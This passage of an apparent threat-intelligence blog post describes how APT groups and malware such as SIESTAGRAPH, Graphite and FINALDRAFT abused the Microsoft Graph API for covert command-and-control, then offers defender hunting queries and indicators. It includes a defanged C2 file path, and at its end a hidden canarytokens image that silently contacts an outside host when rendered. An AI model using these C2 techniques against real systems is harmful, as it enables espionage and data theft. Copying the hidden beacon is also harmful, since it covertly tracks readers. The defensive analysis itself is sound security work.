abuse Graph API, with detailed case studies drawn from real campaigns.</p> <p><br /> <strong>First Instances (2020): APT29/NOBELIUM Manipulating Cloud Identity for Covert Access</strong></p> <p>APT29’s SolarWinds campaign in 2020 is remembered for its <a href="https://www.techtarget.com/whatis/feature/SolarWinds-hack-explained-Everything-you-need-to-know">initial supply chain compromise</a> — but an overlooked innovation was in how the group operated post-exploitation. After gaining access to target tenants, APT29 forged authentication tokens and impersonated privileged users, allowing them to manipulate Azure AD identity configurations.</p> <p><img src="https://github.com/user-attachments/assets/9ee8751c-d349-464b-85a0-88795ae2bfb2" alt="image" /></p> <p>Using these forged identities, they <a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-008a">modified or created service principals</a> with permissions to call Microsoft Graph on behalf of legitimate users. This meant they could read emails, monitor user activity, and exfiltrate data — all while appearing to operate as a normal internal application. This approach effectively let them live off the land in Microsoft’s own cloud, leveraging Graph API calls like Mail.Read, Mail.ReadWrite, and Directory.Read.All.</p> <p>What set this apart from future campaigns was the use of the <em>target’s own tenant</em> and Graph permissions. Later actors would instead rely on attacker-controlled tenants to reach into victim environments. But APT29’s approach embedded malicious behavior inside trusted apps, making detection far more difficult. Traditional telemetry and SIEM rules struggled to flag these actions because, on paper, everything looked legitimate.</p> <p><br /> <strong>Attacker Tenants (2021): APT40 Evolving from Legacy APIs to OneDrive-Based Stealth C2</strong></p> <p>APT40’s early abuse of cloud APIs began before Graph even consolidated Microsoft’s services. In 2019, their implants called the deprecated Outlook Task API to receive commands via <a href="https://www.bleepingcomputer.com/news/security/microsoft-disrupts-nation-state-hacker-op-using-azure-cloud-service/">hidden Outlook tasks in attacker-controlled accounts</a>. As Microsoft deprecated these APIs in late 2020, APT40 smoothly transitioned to Graph — and their operations didn’t miss a beat.</p> <p>In one campaign, APT40 weaponized <a href="https://www.microsoft.com/en-us/security/blog/2020/09/24/gadolinium-detecting-empires-cloud/">PowerShell Empire to communicate with attacker-owned OneDrive infrastructure</a>. Malicious PowerShell was stored as .png files, uploaded to Graph endpoints that mimicked everyday file operations. Their implants then used Graph API to download, decrypt, and execute this content, looping every few seconds to check for new instructions. Within a PowerPoint maldoc sent via a phishing campaign, two payloads would execute, the first disabling a type check <em>DisableActivitySurrogateSelectorTypeCheck</em> as a preemptive requirement for second-stage infection, as well as a .NET binary which downloads, decrypts and runs a .png file.</p> <p>This malicious .png file was actually PowerShell which downloads and uploads fake png files using the Microsoft Graph API to</p> <p>https[:]//graph.microsoft[.]com/v1.0/drive/root:/onlinework/contact/$($ID)_1.png:/content</p> <p>where $ID is the ID of the malware. The APT40 PowerShell was a modified version of the opensource PowershellEmpire toolkit. This toolkit allows an attacker to load additional modules to victim computers via Microsoft Graph API calls obfuscated as .png files (or any other configurable variation).</p> <p>This shift to using their <em>own tenant infrastructure</em> gave them full control and stealth. No permissions were required from the target organization. The activity would not trigger consent prompts, and it wouldn’t leave logs in the victim’s Microsoft 365 tenant. From a network perspective, the implant was just accessing graph.microsoft.com — a completely normal operation in any O365-heavy environment.</p> <p>APT40’s approach shows how easily attackers can turn Microsoft Graph into a fully functional C2 channel that looks native to the cloud. The only hints lie in file paths and usage patterns — both difficult to baseline or alert on in practice.</p> <p><br /> <strong>BLUELIGHT (2021): APT37 and Graph-Enabled Recon</strong></p> <p>North Korea’s APT37 group took a similar approach with their custom malware BLUELIGHT, deployed in a <a href="https://www.volexity.com/blog/2021/08/24/north-korean-bluelight-special-inkysquid-deploys-rokrat/#:~:text=In%20a%20recent%20blog%20post,malware%20family%20known%20as%20BLUELIGHT.">2021 campaign targeting the Daily NK news site</a>. BLUELIGHT began with typical delivery methods — watering hole scripts and Cobalt Strike beacons — but its unique value came from its use of Microsoft Graph for stealthy persistence and data collection.</p> <p>Once executed, BLUELIGHT authenticated to Graph using hardcoded OAuth2 tokens and created a new subdirectory within an attacker-controlled OneDrive account. It then populated that folder with a structured set of subdirectories like logo, theme, and normal, each serving a different role in the C2 protocol.</p> <p>The implant gathered a detailed system profile — including OS version, IP addresses, AV products, and more — encoded the data as a binary blob, and uploaded it to OneDrive as a .jpg file. After initial recon, BLUELIGHT shifted into C2 polling mode, uploading screenshots and retrieving new commands from predefined subfolders.</p> <p>Later demonstrations <a href="https://github.com/boku7/azureOutlookC2">by security researcher Bobby Cooke</a> showed how this same style of malware could be extended to Outlook, using Graph to read and write from the Drafts folder in an attacker mailbox. The result was a fileless, scriptable beacon operating entirely through Microsoft Graph — and with no visibility inside the target tenant.</p> <p><img src="https://github.com/user-attachments/assets/b01d2342-a666-4f2d-9d8e-2141badd6c47" alt="image" /></p> <p><br /> <strong>Graphite (2022): A Return to Empire with OAuth Obfuscation</strong></p> <p>In late 2021 and through 2022, <a href="https://www.trellix.com/blogs/research/prime-ministers-office-compromised/">Trellix</a> and <a href="https://blog.cluster25.duskrise.com/2022/09/23/in-the-footsteps-of-the-fancy-bear-powerpoint-graphite/">Cluster25</a> tracked a malware strain dubbed Graphite, targeting European government offices via malicious Office documents. Graphite heavily leveraged Microsoft Graph for its communication with attacker infrastructure, suggesting a retooled version of the classic Empire OneDrive stager.</p> <p>Graphite implants were delivered via phishing documents exploiting CVE-2021-40444 and used DLL stagers to install the Graphite payload. Once active, the malware created a mutex to avoid reinfection, then entered a persistent loop: refreshing OAuth tokens every 20 minutes, polling OneDrive for new commands, and uploading results to specific folders.</p> <p><img src="https://github.com/user-attachments/assets/859e9d80-c68a-4374-82b9-b353db96ed6b" alt="image" /></p> <p>In a 2022 variant, Graphite downloaded its payloads from OneDrive using .jpeg extensions, further blurring the line between benign and malicious traffic. Even its authentication process was stealthy — using hardcoded refresh tokens and attacker-owned client IDs to retrieve access tokens from login.microsoftonline.com. This enabled Graphite to operate entirely within trusted Microsoft domains while maintaining full control over the flow of data.</p> <p>Detection in this case was theoretically possible by inspecting refresh token POST requests for unusual client IDs, but in practice, TLS encryption and Graph’s ubiquity make this difficult.</p> <p><br /> <strong>SIESTAGRAPH (2022): Fileless Outlook Draft C2 via Microsoft Graph API</strong></p> <p>In 2022, <a href="https://www.elastic.co/security-labs/siestagraph-new-implant-uncovered-in-asean-member-foreign-ministry">Elastic Security Labs documented a malware family dubbed <strong>SIESTAGRAPH</strong></a>, used by suspected Chinese threat actors in targeted espionage campaigns. The name reflects both the implant’s stealthy, almost dormant behavior — “siesta” — and its primary mechanism for command-and-control: <strong>interacting with Microsoft Outlook Draft folders via Microsoft Graph API</strong>.</p> <p>What set SIESTAGRAPH apart was its <strong>fileless</strong> design. Rather than writing payloads to disk or establishing direct outbound connections, the implant authenticated to a compromised Office 365 account and used Graph API to poll the <strong>Drafts folder of Outlook mailboxes</strong>. Commands were retrieved from unsent draft messages, parsed, and executed in memory. The results were then encoded and sent back as new draft messages. Because these messages were never sent, they bypassed conventional email monitoring systems.</p> <p>SIESTAGRAPH’s use of Graph API endpoints like GET /me/mailFolders(‘drafts’)/messages and PATCH /me/messages/{id} allowed it to operate entirely within the sanctioned Microsoft 365 ecosystem. This tactic eliminated the need for traditional C2 infrastructure and let the implant blend in with ordinary user activity — especially in organizations where email automation, shared inboxes, or CRM tools already generate Graph-based mailbox traffic.</p> <p>This technique mirrored what would later be seen in FINALDRAFT and CMD365, making SIESTAGRAPH something of a blueprint for Graph-enabled C2. Its effectiveness lies not only in the covert communication method, but also in the lack of visibility most organizations have into Graph API mailbox operations — particularly when it comes to unsent items.</p> <p>Defenders with access to detailed Microsoft 365 logs can attempt to flag repeated Graph access to draft folders or high-frequency message editing that doesn’t align with typical workflows. But in most cases, catching SIESTAGRAPH-like activity means correlating behavior across identity, endpoint, and Graph API telemetry — a challenge even for mature SOCs.</p> <p><br /> <strong>CreepyDrive (2022): POLONIUM and Cross-Cloud API C2</strong></p> <p>POLONIUM, a Lebanon-based actor believed to be linked with Iran’s Ministry of Intelligence and Security, added a different twist. In 2022, they were caught using a lightweight <a href="https://www.microsoft.com/en-us/security/blog/2022/06/02/exposing-polonium-activity-and-infrastructure-targeting-israeli-organizations/">PowerShell backdoor dubbed CreepyDrive</a> that accessed both OneDrive and Dropbox to execute commands, exfiltrate files, and download payloads.</p> <p>CreepyDrive used hardcoded credentials and refresh tokens to authenticate via Graph API. Once authenticated, the implant ran in a continuous loop, checking a OneDrive-hosted data.txt file for instructions and writing results to response.json. Execution options included running PowerShell commands, uploading local files, or downloading additional payloads.</p> <p><img src="https://github.com/user-attachments/assets/deb8287f-0ece-416e-b467-30c1868149ee" alt="image" /></p> <p>Each implant instance communicated with its own attacker-controlled OneDrive account, avoiding shared indicators. Because all requests were made via Graph API and used native PowerShell cmdlets (Invoke-WebRequest), defenders had little telemetry to rely on — especially since Graph calls appeared indistinguishable from standard OneDrive usage.</p> <p>This technique once again highlighted the appeal of Graph: a free, stealthy, and cloud-native C2 mechanism requiring no infrastructure setup beyond a Microsoft account.</p> <p><br /> <strong>Graphican (2023): APT15’s Evolution of Cloud-Based Espionage</strong></p> <p>In June 2023, <a href="https://www.security.com/threat-intelligence/flea-backdoor-microsoft-graph-apt15">Symantec discovered Backdoor.Graphican</a>, which was being used by the Flea (aka APT15, Nickel) advanced persistent threat (APT) group in an espionage campaign heavily focused on foreign affairs ministries in the Americas. Graphican is an evolution of an older Flea backdoor known as <a href="https://web-assets.esetstatic.com/wls/2019/07/ESET_Okrum_and_Ketrican.pdf">Ketrican</a>, which itself was based on a previous malware—BS2005—that was also used by Flea.</p> <p>Graphican has the same functionality as Ketrican, but its new features included the use of the Microsoft Graph API and OneDrive to obtain its C&amp;C infrastructure. The most noteworthy aspect of Graphican is its abuse of the Microsoft Graph API and OneDrive to obtain its C&amp;C server. The fact that a similar technique was used by <a href="https://www.broadcom.com/support/security-center/protection-bulletin/continuous-operations-of-the-swallowtail-apt-group">Swallowtail</a>, an unconnected APT group operating out of a different region, is also worth noting. Once a technique is used by one threat actor, we often see other groups follow suit, so it will be interesting to see if this technique is something we see being adopted more widely by other APT groups and cyber criminals.</p> <p><br /> <strong>GoGra (2023): Command-and-Control Over Outlook Mailboxes</strong></p> <p>In late 2023, researchers at Symantec uncovered a new <a href="https://www.security.com/threat-intelligence/cloud-espionage-attacks">Go-based backdoor named <strong>GoGra</strong></a>, targeting a media organization in South Asia. At first glance, it’s a straightforward backdoor — but what makes it stand out is how it leverages <strong>Microsoft Graph API to interact with Outlook mailboxes</strong> for covert command-and-control.</p> <p>The malware authenticates to a Microsoft account and reads emails from an attacker-<a href="https://cybermaterial.com/gogra-backdoor-malware/?utm_source=chatgpt.com">created user with the name “FNU LNU</a>.” Commands are embedded in email messages with subjects beginning with “Input.” GoGra uses the Graph API to access these messages, decrypt their contents via AES-256 in CBC mode, and execute the resulting commands locally. Once execution is complete, the output is encrypted and exfiltrated by crafting a new message <a href="https://thehackernews.com/2024/08/new-go-based-backdoor-gogra-targets.html?utm_source=chatgpt.com">with the subject “Output</a>” — again, sent through Graph API.</p> <p>This technique exemplifies the evolution of cloud-native C2. Rather than spinning up traditional C2 infrastructure, GoGra rides on the back of Microsoft’s own mail infrastructure, with all its legitimate encryption and authentication workflows. To an observer, this looks like a user reading and sending email through Microsoft 365 — nothing more.</p> <p><br /> <strong>Grager (2024): Hiding in OneDrive File Transfers</strong></p> <p>By early 2024, Microsoft Graph had become such a reliable mechanism for evasion that another campaign emerged using a similar approach — this time with a malware family called <a href="https://www.scworld.com/news/embargo-lifts-6-am-eastern-august-7-symantec-points-to-rise-in-attacks-on-cloud-infrastructure?utm_source=chatgpt.com"><strong>Grager</strong>, deployed against organizations in Taiwan, Hong Kong, and Vietnam</a>. Believed to be the work of a suspected Chinese APT (UNC5330), Grager leveraged <strong>Microsoft OneDrive as a storage-based C2 channel</strong>, with all communication handled through Graph API.</p> <p>Once executed on a victim machine, Grager <a href="https://www.msspalert.com/brief/microsoft-graph-api-exploitation-in-state-backed-espionage-on-the-rise">used Graph API endpoints to interact with specific folders in an attacker-controlled OneDrive account</a>. Commands and payloads were stored as benign-looking files, which were retrieved via GET requests. Outputs or staged data were then uploaded back to the same OneDrive using PUT requests — all routed through Graph API’s drive endpoints. This kept C2 traffic well within the boundaries of trusted domains and encryption.</p> <p>Much like APT40’s earlier PNG-based payload stagers, Grager’s abuse of OneDrive via Graph highlights the ongoing trend of attackers preferring infrastructure they don’t have to own. The lack of OAuth consent prompts and minimal visibility in target tenants makes this technique ideal for long-term persistence.</p> <p><br /> <strong>BirdyClient (2024): OneDrive as a Stealthy C2 Server</strong></p> <p>In 2024, <a href="https://www.security.com/threat-intelligence/graph-api-threats">Symantec researchers identified a previously undocumented malware dubbed BirdyClient</a> (also known as OneDriveBirdyClient) deployed in Ukraine. This malware utilized a DLL file that mimicked a legitimate DLL associated with the application Apoint and connected to Microsoft Graph API to <a href="https://www.broadcom.com/support/security-center/protection-bulletin/birdyclient-malware-leverages-microsoft-graph-api-for-c-c-communication">use OneDrive as a C2 server</a> for uploading and downloading files.</p> <p>The exact distribution method of the DLL file remains unclear, as does the full scope of the attackers’ objectives and identities. The increasing reliance on Microsoft Graph API by attackers is partly driven by the API’s ability to camouflage malicious communications with legitimate traffic to widely used cloud services, which are less likely to arouse suspicion.</p> <p><br /> <strong>CMD365 (2024): Email Folder C2, Masquerading as Postman</strong></p> <p>Another 2024 campaign introduced <strong>CMD365</strong>, a .NET-based backdoor that disguised itself as the <a href="https://www.sentinelone.com/labs/wip26-espionage-threat-actors-abuse-cloud-infrastructure-in-targeted-telco-attacks/">legitimate Postman application</a>. What set it apart wasn’t the disguise, but how it <strong>abused Graph API to turn Outlook inbox folders into a control panel</strong>.</p> <p>Using hardcoded credentials, CMD365 authenticated to Microsoft 365 and created unique folders in Outlook for each infected machine. It would then poll those folders via Graph API calls, searching for messages that contained encoded commands. These commands were executed locally, and the <a href="https://apt.etda.or.th/cgi-bin/listgroups.cgi?t=CMD365">results were posted back by generating new emails</a> — all orchestrated through standard Graph API calls like GET /messages, POST /sendMail, and folder manipulation endpoints.</p> <p>This approach offers multiple advantages. It blends into environments where email traffic is high, leverages existing cloud infrastructure, and requires no external server that might trigger traditional network alerts. The malware’s access pattern looks like an application syncing folders and processing mail — exactly what many business apps do every day.</p> <p><br /> <strong>Havoc Framework: Post-Exploitation via SharePoint</strong></p> <p>Threat actors didn’t just stop at Outlook and OneDrive. In 2024, a phishing campaign using the <strong>Havoc post-exploitation framework</strong> integrated <strong>SharePoint into its C2 workflow</strong> <a href="https://candid.technology/havoc-c2-framework-exploited-via-sharepoint-in-phishing-campaign/?utm_source=chatgpt.com">using Graph API as the transport mechanism</a>. This marked a growing trend of turning Microsoft’s own collaboration tools into covert infrastructure.</p> <p>The attack started with an HTML phishing payload that redirected victims to a SharePoint-hosted PowerShell script. Once the Havoc Demon agent was deployed, it used Microsoft Graph API to communicate with the attacker-controlled SharePoint site. All command-and-response traffic was stored in SharePoint documents, encoded in AES-256 CTR mode and retrieved via Graph API file calls.</p> <p><img src="https://github.com/user-attachments/assets/35adda77-07f9-417b-8b37-acebef158c67" alt="image" /></p> <p>This campaign demonstrated how flexible the Graph API model really is. The attacker didn’t need an external domain or even a VPS — SharePoint did the heavy lifting. Graph API allowed the agent to blend into enterprise collaboration traffic, creating a challenge for defenders relying on URL filtering or domain-based detection. The SharePoint activity looked like legitimate file collaboration, but it was actually a full-featured C2 channel.</p> <p><br /> <strong>FastHTTP Brute-Force Campaign: High-Speed Identity Attacks</strong></p> <p>While most Graph abuse campaigns focus on stealthy post-compromise techniques, the <strong>FastHTTP brute-force campaign</strong> identified in early 2025 shifted focus to <strong>initial access</strong>. Attackers leveraged the high-speed fasthttp Go library to launch <a href="https://medium.com/%40hir3n/hunting-fasthttp-bruteforce-attack-targeting-microsoft-365-users-4dd235af01d7?utm_source=chatgpt.com">brute-force login attempts</a> against <strong>Azure Active Directory endpoints</strong>, including those used in Graph API authentication flows.</p> <p>Using POST requests to login.microsoftonline.com, attackers spammed user credentials and multi-factor authentication prompts at high frequency. Because the Graph API is central to Azure AD identity functions, many of these requests funneled through Graph authentication handlers. Attackers used known email formats and predictable usernames to spray common passwords, and in some cases, succeeded in accessing accounts or triggering excessive MFA prompts.</p> <p><a href="https://blog.netizen.net/2025/01/21/fasthttp-exploited-in-new-brute-force-campaign-what-soc-teams-need-to-know/?utm_source=chatgpt.com">Roughly 10% of attempts were reportedly successful</a>, with follow-up activity showing signs of persistent access and lateral movement. Unlike the other use-cases which leveraged Graph API for stealthy persistence, this campaign weaponized it for sheer scale and speed.</p> <p>From a detection perspective, this type of abuse is harder to hide. But because it uses the same Graph endpoints as legitimate apps and logins, it still presents a challenge unless login telemetry is tightly integrated with behavioral baselining and geographic analysis.</p> <p><br /> <strong>FINALDRAFT (2025): Outlook Drafts as a Covert C2 Channel</strong></p> <p>In early 2025, <a href="https://www.elastic.co/security-labs/finaldraft">Elastic Security Labs uncovered a sophisticated malware strain named FINALDRAFT</a>, targeting a foreign ministry. This malware leveraged Microsoft Outlook’s Drafts folder, accessed via the Microsoft Graph API, as a command-and-control (C2) channel. By utilizing Outlook drafts, the malware could send and receive commands without triggering traditional email monitoring tools.</p> <p>FINALDRAFT operates in conjunction with a custom loader called PATHLOADER, which downloads and executes encrypted shellcode to initiate the malware’s deployment. Once activated, FINALDRAFT uses the Microsoft Graph API to interact with Outlook’s draft email folder for C2 communications. Commands are received via drafts created by attackers, and responses are sent back in new drafts, avoiding detection by traditional email monitoring tools.</p> <p><img src="https://github.com/user-attachments/assets/03026dad-6d26-4a19-b3ff-a1b05e08809f" alt="image" /></p> <p>The malware includes 37 command handlers enabling actions such as process injection, file manipulation, and network proxying. It also supports advanced techniques like executing PowerShell commands without invoking “powershell.exe” and using stolen NTLM hashes for lateral movement. Additionally, FINALDRAFT employs obfuscation techniques like string encryption and API hashing to evade static analysis.</p> <p>This technique is not isolated; similar abuse of the Graph API has been observed in previous malware campaigns like SIESTAGRAPH and Grager. Such attacks exploit trusted cloud services to mask malicious activities within legitimate traffic patterns, complicating detection efforts. Elastic Security Labs also identified a Linux variant of FINALDRAFT, indicating cross-platform capabilities.</p> <p><br /> <strong>Hunting Microsoft Graph Abuse: What Defenders Should Look For</strong></p> <p>Detecting Graph API abuse isn’t easy — and that’s precisely why threat actors love it. The API’s versatility, ubiquity, and encryption make it a perfect candidate for hiding in plain sight. But as with any tactic, patterns emerge. While adversaries can blend in with normal traffic, they can’t operate without leaving some trace behind. Defenders just have to know where to look.</p> <p>Here’s a breakdown of hunting strategies that can help uncover malicious Graph API activity, from network anomalies to process behaviors — with a few practical tricks for SOC analysts.</p> <p><br /> <strong>Don’t Discount the Classics: MailItemsAccessed Remains a Solid Strategy</strong></p> <p>In the wake of the SolarWinds campaign, Microsoft introduced the MailItemsAccessed audit log action to address a crucial blind spot: programmatic mailbox access via Microsoft Graph API and EWS that previously went undetected. This event now allows security teams to detect when mail items are accessed by applications — such as service principals — rather than end users. Malicious use of this access, such as what APT29 leveraged to silently read executive email without triggering standard user audit logs, can be surfaced by filtering for unusual application IDs, access outside business hours, or unauthorized delegated access to sensitive mailboxes. A simple baseline helps: identify all known and approved app IDs in your environment and alert on any deviations.</p> <pre><code> AuditLogs | where Operation == "MailItemsAccessed" | where LogonType in ("Delegate", "Application") | where ClientAppId !in ("&lt;known_app_id_1&gt;", "&lt;known_app_id_2&gt;") | project TimeGenerated, UserId, ClientAppId, LogonType, UserAgent, ApplicationId </code></pre> <p>Detection becomes even more effective when correlated with Azure AD sign-in and token issuance logs. Malicious Graph API abuse typically involves OAuth refresh tokens issued to unfamiliar apps or client IDs outside your organization’s control. High-frequency polling, external tenant app registrations, and consent grants using risky scopes like Mail.ReadWrite should raise flags. SOCs can hunt for non-interactive sign-ins paired with access to mailbox folders like Drafts, especially if the same mailbox is accessed repeatedly using an application identity.</p> <pre><code> SigninLogs | where AppDisplayName !in ("Office 365 Exchange Online", "Outlook", "YourKnownApps") | where ConditionalAccessStatus != "success" | where ResourceDisplayName == "Microsoft Graph" | project TimeGenerated, UserPrincipalName, AppDisplayName, IPAddress, Status, AuthenticationRequirement </code></pre> <p>Finally, any detection strategy should include behavioral patterns: Graph-based implants need to poll regularly, so look for repetitive GET requests to mailFolders or driveItem endpoints. Track which processes are reaching out to graph.microsoft.com from endpoints — especially unsigned binaries, PowerShell spawn points, or DLLs side-loaded in memory. The goal isn’t just to catch access — it’s to recognize the adversary’s operational rhythm. Attackers may hide behind Microsoft’s trusted cloud infrastructure, but they still need to come up for air. These audit and identity signals are your way of catching them in the act.</p> <p><strong>Look for Anomalies in Graph API URI Patterns</strong></p> <p>Even in cloud-first environments, Graph traffic isn’t completely random. Microsoft applications follow fairly consistent URI patterns when interacting with Graph endpoints. Malicious usage, on the other hand, often involves access to unusual file paths, custom OneDrive directories, or mailbox folders that deviate from standard usage.</p> <p>While searching for exact Graph API URLs from previous APT campaigns (drive/root:/onlinework/contact/…, for example) won’t yield much in the long run, identifying <em>new or rarely seen</em> paths can be a powerful signal. Behavioral baselining — particularly around Graph URIs involving drive/, me/messages, or drafts — can help spot suspicious deviations, especially if the same path is accessed repeatedly in a short time frame.</p> <p><strong>Pattern Graph Request Frequency and Method Types</strong></p> <p>Graph API-based C2 often involves polling. Implants need to check for new commands (typically using GET requests), exfiltrate data (PUT or PATCH), and regularly refresh OAuth tokens (POST to /token endpoints). While each individual request may look normal, the combined pattern — high-frequency or scheduled polling to specific Graph endpoints — can give it away.</p> <p>Look for:</p> <ul> <li>Periodic access to the same driveItem or message ID</li> <li>Unusual volume of GET or PUT requests to graph.microsoft.com</li> <li>Recurrent POST requests to /oauth2/v2.0/token outside of normal token lifetimes</li> <li>Implants that make requests at rigid intervals (e.g. every 30 seconds)</li> </ul> <p>Behavioral clustering and temporal analysis can highlight these patterns when a single request would not raise suspicion.</p> <p><strong>Correlate Client IDs in OAuth Flows</strong></p> <p>Every legitimate Graph interaction tied to an application uses a registered client_id. You should know yours. Monitoring for OAuth token exchanges involving unknown or suspicious client_id values — especially during initial POST requests to login.microsoftonline.com — is a high-value detection method.</p> <p>When an adversary is using their own tenant to reach into yours (as many now do), their client_id won’t match your own application’s registered values. Catching unknown client_ids or tokens being requested from an unfamiliar redirect URI (urn:ietf:wg:oauth:2.0:oob, for example) can tip you off to external abuse.</p> <p>Bonus: If you’re collecting decrypted network traffic or proxy logs, this becomes much easier. If not, identity-based SIEM integrations or token introspection (if supported) can be leveraged internally.</p> <p><strong>Use EDR to Link Processes and Domain Lookups</strong></p> <p>Graph implants may run in-memory, load as DLLs, or even hijack trusted binaries to remain stealthy — but they still need to resolve graph.microsoft.com. A powerful detection strategy is to correlate <strong>which processes</strong> are generating DNS requests to Graph endpoints.</p> <p>You’re not looking for Word, Outlook, or a signed Microsoft binary here. You’re looking for unusual or rare binaries — often DLL sideloaded tools or unsigned payloads — initiating outbound Graph lookups.</p> <p>If your EDR platform supports process-to-DNS correlation, this technique can surface suspicious implant behavior, especially in cases like FINALDRAFT or Graphite, where custom malware impersonates trusted DLLs or persists quietly within the host.</p> <p><strong>Correlate Suspicious PowerShell and Local File Activity</strong></p> <p>Almost every Graph-based C2 tool eventually executes something locally. That includes decoding payloads from OneDrive, writing output to temp directories, executing PowerShell commands, or interacting with COM objects.</p> <p>Focus on:</p> <ul> <li>PowerShell instances that don’t invoke powershell.exe directly (e.g. via rundll32.exe, mshta.exe, or WMI)</li> <li>Scripts interacting with Graph API endpoints using Invoke-WebRequest or Invoke-RestMethod</li> <li>File writes to system or user directories involving unexpected formats like .jpg, .png, or .dat that are actually encoded data</li> <li>Unusual DLLs or processes that spawn Powershell or load .NET assemblies</li> </ul> <p>Correlate these host-level artifacts with outbound network Graph traffic to stack the signals together.</p> <p><strong>Look for Token Abuse Across Tenants</strong></p> <p>Some Graph-based malware abuses refresh tokens that don’t belong to the tenant it’s operating in — especially in attacks where the implant communicates with a remote, attacker-controlled O365 account. This manifests as:</p> <ul> <li>Token refresh activity (POST /token) from your tenant pointing to a client ID that isn’t yours</li> <li>Cross-tenant file activity — your users accessing OneDrive accounts not provisioned by your org</li> <li>Draft message manipulation in mailboxes that aren’t part of normal workflows</li> </ul> <p>Many identity and security platforms (e.g. Defender for Cloud Apps, Okta, Azure AD logs) now offer visibility into these tenant boundaries. Monitor for out-of-bound refresh token usage or mailbox interactions between unrelated accounts.</p> <p><strong>Monitor for Unusual Draft or Shared Mailbox Activity</strong></p> <p>Techniques like FINALDRAFT and AzureOutlookC2 rely on reading and writing draft emails via Graph API. In some cases, these messages are never sent — they’re just used as a covert channel between attacker and implant.</p> <p>SOC teams should monitor for:</p> <ul> <li>Unusual access patterns to the drafts folder via API</li> <li>Frequent reads and writes from service principals that don’t normally interact with mailboxes</li> <li>Drafts being created and deleted in short succession</li> <li>Shared mailboxes being accessed outside business hours or from new IPs</li> </ul> <p>This is especially effective in environments where draft folder access is rare or limited to specific workflows.</p> <p><strong>Conclusion</strong></p> <p>Microsoft Graph abuse isn’t going away — and the detection surface is subtle, spread across identity, endpoint, and cloud layers. But by thinking like an attacker and watching for the architectural patterns they must rely on (frequent polling, unknown tenants, predictable timing, uncommon URI paths), defenders can still carve out detection space in this otherwise gray area of traffic.</p> <p>Your best bet? <strong>Correlate signals across layers.</strong> A single POST to graph.microsoft.com means little. But when paired with suspicious PowerShell, a DNS lookup from an unsigned binary, and access to an unfamiliar client_id — now you’ve got a story worth investigating.</p> <p><img src="http://canarytokens.com/about/terms/tags/xsoqck95cshhefqtyhjgqb8j5/post.jsp" style="display: none;" /></p>